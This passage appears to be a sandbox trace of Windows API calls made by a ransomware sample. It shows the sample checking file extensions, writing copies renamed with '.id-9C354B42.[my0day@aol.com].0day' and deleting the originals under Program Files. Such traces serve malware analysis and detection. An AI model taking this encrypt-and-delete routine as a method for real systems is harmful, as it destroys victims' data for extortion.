lstrcmpiW (lpString1=".bz2", lpString2=".png") returned -1 [0048.828] lstrlenW (lpString=".7z") returned 3 [0048.828] lstrcmpiW (lpString1=".7z", lpString2="png") returned -1 [0048.828] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\play-static.png") returned 68 [0048.828] lstrlenW (lpString=".dbf") returned 4 [0048.828] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0051.807] MoveFileW (lpExistingFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsScenesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsscenesbackground_pal.wmv"), lpNewFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsScenesBackground_PAL.wmv.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsscenesbackground_pal.wmv.id-9c354b42.[my0day@aol.com].0day")) returned 0 [0052.378] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.378] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.378] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00011_.GIF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00011_.gif.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x16c [0052.378] GetLastError () returned 0x0 [0052.378] ReadFile (in: hFile=0x190, lpBuffer=0x34c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesRead=0x2c5fed4*=0x1c30, lpOverlapped=0x0) returned 1 [0052.380] WriteFile (in: hFile=0x16c, lpBuffer=0x34c0020*, nNumberOfBytesToWrite=0x1c40, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesWritten=0x2c5fc9c*=0x1c40, lpOverlapped=0x0) returned 1 [0052.381] ReadFile (in: hFile=0x190, lpBuffer=0x34c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesRead=0x2c5fed4*=0x0, lpOverlapped=0x0) returned 1 [0052.381] WriteFile (in: hFile=0x16c, lpBuffer=0x34c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesWritten=0x2c5fc9c*=0xec, lpOverlapped=0x0) returned 1 [0052.381] SetEndOfFile (hFile=0x16c) returned 1 [0052.381] CloseHandle (hObject=0x16c) returned 1 [0052.381] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.381] SetEndOfFile (hFile=0x190) returned 1 [0052.382] CloseHandle (hObject=0x190) returned 1 [0052.382] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00011_.GIF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0052.382] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00011_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00011_.gif")) returned 1 [0052.382] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00011_.GIF") returned 63 [0052.382] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00011_.GIF") returned 63 [0052.382] lstrlenW (lpString=".doc") returned 4 [0052.382] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0052.382] lstrlenW (lpString=".docx") returned 5 [0052.382] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0052.382] lstrlenW (lpString=".pdf") returned 4 [0052.382] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0052.382] lstrlenW (lpString=".xls") returned 4 [0052.382] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0052.383] lstrlenW (lpString=".xlsx") returned 5 [0052.383] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0052.383] lstrlenW (lpString=".ppt") returned 4 [0052.383] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0052.383] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00011_.GIF") returned 63 [0052.383] lstrlenW (lpString=".zip") returned 4 [0052.383] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0052.383] lstrlenW (lpString=".rar") returned 4 [0052.383] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0052.383] lstrlenW (lpString=".bz2") returned 4 [0052.383] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0052.383] lstrlenW (lpString=".7z") returned 3 [0052.383] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0052.383] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00011_.GIF") returned 63 [0052.383] lstrlenW (lpString=".dbf") returned 4 [0052.383] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0052.383] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00011_.GIF") returned 63 [0052.383] lstrlenW (lpString=".1cd") returned 4 [0052.383] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0052.383] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00011_.GIF") returned 63 [0052.383] lstrlenW (lpString=".jpg") returned 4 [0052.383] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0052.383] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00011_.GIF") returned 63 [0052.383] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00011_.GIF") returned 63 [0052.383] lstrlenW (lpString=".doc") returned 4 [0052.384] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0052.384] lstrlenW (lpString=".docx") returned 5 [0052.384] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0052.384] lstrlenW (lpString=".pdf") returned 4 [0052.384] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0052.384] lstrlenW (lpString=".xls") returned 4 [0052.384] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0052.384] lstrlenW (lpString=".xlsx") returned 5 [0052.384] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0052.384] lstrlenW (lpString=".ppt") returned 4 [0052.384] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0052.384] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00011_.GIF") returned 63 [0052.384] lstrlenW (lpString=".zip") returned 4 [0052.384] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0052.384] lstrlenW (lpString=".rar") returned 4 [0052.384] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0052.384] lstrlenW (lpString=".bz2") returned 4 [0052.384] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0052.384] lstrlenW (lpString=".7z") returned 3 [0052.384] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0052.384] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00011_.GIF") returned 63 [0052.384] lstrlenW (lpString=".dbf") returned 4 [0052.384] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0052.384] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00011_.GIF") returned 63 [0052.384] lstrlenW (lpString=".1cd") returned 4 [0052.384] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0052.384] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00011_.GIF") returned 63 [0052.384] lstrlenW (lpString=".jpg") returned 4 [0052.384] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0052.384] lstrcmpiW (lpString1=".GIF", lpString2=".0day") returned 1 [0052.385] lstrlenW (lpString="AG00157_.GIF") returned 12 [0052.385] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00157_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00157_.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0052.385] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x2c5ff1c | out: lpFileSize=0x2c5ff1c*=4955) returned 1 [0052.385] CloseHandle (hObject=0x190) returned 1 [0052.385] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00157_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00157_.gif")) returned 0x20 [0052.385] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00157_.GIF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00157_.gif.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0052.385] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00157_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00157_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0052.385] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.385] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.385] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00157_.GIF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00157_.gif.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x16c [0052.385] GetLastError () returned 0x0 [0052.385] ReadFile (in: hFile=0x190, lpBuffer=0x34c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesRead=0x2c5fed4*=0x135b, lpOverlapped=0x0) returned 1 [0052.387] WriteFile (in: hFile=0x16c, lpBuffer=0x34c0020*, nNumberOfBytesToWrite=0x1360, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesWritten=0x2c5fc9c*=0x1360, lpOverlapped=0x0) returned 1 [0052.388] ReadFile (in: hFile=0x190, lpBuffer=0x34c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesRead=0x2c5fed4*=0x0, lpOverlapped=0x0) returned 1 [0052.388] WriteFile (in: hFile=0x16c, lpBuffer=0x34c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesWritten=0x2c5fc9c*=0xec, lpOverlapped=0x0) returned 1 [0052.388] SetEndOfFile (hFile=0x16c) returned 1 [0052.388] CloseHandle (hObject=0x16c) returned 1 [0052.388] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.388] SetEndOfFile (hFile=0x190) returned 1 [0052.389] CloseHandle (hObject=0x190) returned 1 [0052.389] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00157_.GIF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0052.389] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00157_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00157_.gif")) returned 1 [0052.389] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00157_.GIF") returned 63 [0052.389] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00157_.GIF") returned 63 [0052.389] lstrlenW (lpString=".doc") returned 4 [0052.389] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0052.389] lstrlenW (lpString=".docx") returned 5 [0052.389] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0052.390] lstrlenW (lpString=".pdf") returned 4 [0052.390] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0052.390] lstrlenW (lpString=".xls") returned 4 [0052.390] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0052.390] lstrlenW (lpString=".xlsx") returned 5 [0052.390] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0052.390] lstrlenW (lpString=".ppt") returned 4 [0052.390] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0052.390] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00157_.GIF") returned 63 [0052.390] lstrlenW (lpString=".zip") returned 4 [0052.390] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0052.390] lstrlenW (lpString=".rar") returned 4 [0052.390] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0052.390] lstrlenW (lpString=".bz2") returned 4 [0052.390] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0052.390] lstrlenW (lpString=".7z") returned 3 [0052.390] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0052.390] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00157_.GIF") returned 63 [0052.390] lstrlenW (lpString=".dbf") returned 4 [0052.390] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0052.390] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00157_.GIF") returned 63 [0052.390] lstrlenW (lpString=".1cd") returned 4 [0052.390] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0052.390] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00157_.GIF") returned 63 [0052.390] lstrlenW (lpString=".jpg") returned 4 [0052.390] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0052.390] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00157_.GIF") returned 63 [0052.390] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00157_.GIF") returned 63 [0052.390] lstrlenW (lpString=".doc") returned 4 [0052.390] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0052.390] lstrlenW (lpString=".docx") returned 5 [0052.390] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0052.390] lstrlenW (lpString=".pdf") returned 4 [0052.390] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0052.390] lstrlenW (lpString=".xls") returned 4 [0052.391] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0052.391] lstrlenW (lpString=".xlsx") returned 5 [0052.391] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0052.391] lstrlenW (lpString=".ppt") returned 4 [0052.391] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0052.391] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00157_.GIF") returned 63 [0052.391] lstrlenW (lpString=".zip") returned 4 [0052.391] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0052.391] lstrlenW (lpString=".rar") returned 4 [0052.391] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0052.391] lstrlenW (lpString=".bz2") returned 4 [0052.391] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0052.391] lstrlenW (lpString=".7z") returned 3 [0052.391] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0052.391] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00157_.GIF") returned 63 [0052.391] lstrlenW (lpString=".dbf") returned 4 [0052.391] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0052.391] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00157_.GIF") returned 63 [0052.391] lstrlenW (lpString=".1cd") returned 4 [0052.391] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0052.391] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00157_.GIF") returned 63 [0052.391] lstrlenW (lpString=".jpg") returned 4 [0052.391] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0052.391] lstrcmpiW (lpString1=".GIF", lpString2=".0day") returned 1 [0052.391] lstrlenW (lpString="AG00158_.GIF") returned 12 [0052.391] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00158_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00158_.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0052.392] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x2c5ff1c | out: lpFileSize=0x2c5ff1c*=5030) returned 1 [0052.392] CloseHandle (hObject=0x190) returned 1 [0052.392] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00158_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00158_.gif")) returned 0x20 [0052.392] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00158_.GIF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00158_.gif.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0052.392] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00158_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00158_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0052.392] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.392] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.392] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00158_.GIF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00158_.gif.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x16c [0052.392] GetLastError () returned 0x0 [0052.392] ReadFile (in: hFile=0x190, lpBuffer=0x34c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesRead=0x2c5fed4*=0x13a6, lpOverlapped=0x0) returned 1 [0052.394] WriteFile (in: hFile=0x16c, lpBuffer=0x34c0020*, nNumberOfBytesToWrite=0x13b0, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesWritten=0x2c5fc9c*=0x13b0, lpOverlapped=0x0) returned 1 [0052.395] ReadFile (in: hFile=0x190, lpBuffer=0x34c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesRead=0x2c5fed4*=0x0, lpOverlapped=0x0) returned 1 [0052.395] WriteFile (in: hFile=0x16c, lpBuffer=0x34c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesWritten=0x2c5fc9c*=0xec, lpOverlapped=0x0) returned 1 [0052.395] SetEndOfFile (hFile=0x16c) returned 1 [0052.395] CloseHandle (hObject=0x16c) returned 1 [0052.395] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.395] SetEndOfFile (hFile=0x190) returned 1 [0052.396] CloseHandle (hObject=0x190) returned 1 [0052.396] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00158_.GIF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0052.396] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00158_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00158_.gif")) returned 1 [0052.396] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00158_.GIF") returned 63 [0052.396] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00158_.GIF") returned 63 [0052.397] lstrlenW (lpString=".doc") returned 4 [0052.397] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0052.397] lstrlenW (lpString=".docx") returned 5 [0052.397] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0052.397] lstrlenW (lpString=".pdf") returned 4 [0052.397] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0052.397] lstrlenW (lpString=".xls") returned 4 [0052.397] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0052.397] lstrlenW (lpString=".xlsx") returned 5 [0052.397] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0052.397] lstrlenW (lpString=".ppt") returned 4 [0052.397] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0052.397] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00158_.GIF") returned 63 [0052.397] lstrlenW (lpString=".zip") returned 4 [0052.397] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0052.397] lstrlenW (lpString=".rar") returned 4 [0052.397] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0052.397] lstrlenW (lpString=".bz2") returned 4 [0052.397] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0052.397] lstrlenW (lpString=".7z") returned 3 [0052.397] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0052.397] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00158_.GIF") returned 63 [0052.397] lstrlenW (lpString=".dbf") returned 4 [0052.397] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0052.397] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00158_.GIF") returned 63 [0052.397] lstrlenW (lpString=".1cd") returned 4 [0052.397] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0052.397] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00158_.GIF") returned 63 [0052.397] lstrlenW (lpString=".jpg") returned 4 [0052.397] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0052.397] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00158_.GIF") returned 63 [0052.397] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00158_.GIF") returned 63 [0052.397] lstrlenW (lpString=".doc") returned 4 [0052.397] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0052.397] lstrlenW (lpString=".docx") returned 5 [0052.397] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0052.398] lstrlenW (lpString=".pdf") returned 4 [0052.398] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0052.398] lstrlenW (lpString=".xls") returned 4 [0052.398] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0052.398] lstrlenW (lpString=".xlsx") returned 5 [0052.398] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0052.398] lstrlenW (lpString=".ppt") returned 4 [0052.398] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0052.398] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00158_.GIF") returned 63 [0052.398] lstrlenW (lpString=".zip") returned 4 [0052.398] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0052.398] lstrlenW (lpString=".rar") returned 4 [0052.398] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0052.398] lstrlenW (lpString=".bz2") returned 4 [0052.398] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0052.398] lstrlenW (lpString=".7z") returned 3 [0052.398] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0052.398] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00158_.GIF") returned 63 [0052.398] lstrlenW (lpString=".dbf") returned 4 [0052.398] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0052.398] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00158_.GIF") returned 63 [0052.398] lstrlenW (lpString=".1cd") returned 4 [0052.398] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0052.398] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00158_.GIF") returned 63 [0052.398] lstrlenW (lpString=".jpg") returned 4 [0052.398] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0052.398] lstrcmpiW (lpString1=".GIF", lpString2=".0day") returned 1 [0052.398] lstrlenW (lpString="AG00160_.GIF") returned 12 [0052.398] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00160_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00160_.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0052.399] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x2c5ff1c | out: lpFileSize=0x2c5ff1c*=1146) returned 1 [0052.399] CloseHandle (hObject=0x190) returned 1 [0052.399] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00160_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00160_.gif")) returned 0x20 [0052.399] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00160_.GIF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00160_.gif.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0052.399] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00160_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00160_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, 